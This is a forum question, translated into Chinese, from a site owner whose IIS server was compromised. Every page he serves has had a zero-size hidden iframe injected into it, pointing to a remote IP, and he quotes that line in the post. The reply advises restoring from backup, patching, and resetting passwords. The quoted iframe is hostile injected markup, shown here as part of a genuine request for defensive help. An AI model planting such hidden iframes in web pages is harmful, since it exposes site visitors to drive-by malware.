可能重复:
我的服务器被黑了 紧急求助
这不是重复的。上面的问题没有解释如何做到这一点。
我的 VPS 刚刚遭到黑客攻击,所有页面的 html 标签之前均注入了恶意 iframe。
代码如下:
<iframe src= http://117.21.247.171:700/1.htm width=0 height=0></iframe>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="pt-BR"> ...
一开始我以为是与 wordpress 有关的东西,但是我的 asp.net 网站也被感染了,即使我创建一个没有任何内容的静态 html 文件,iframe 也会被注入。
我正在使用带有 IIS7.5 7600 的 Windows Server 2008 R2 Standard。
编辑:嘿,为什么关闭了?
我非常想知道如何在 IIS 中做到这一点,有什么想法吗?
安德烈
答案1
从各方面来看,这都无所谓。您的服务器遭到了黑客攻击 - 您需要做的是从上次已知的良好备份中恢复,并确保已完全修补,并安装足够的防火墙和 IPS 并重置所有密码。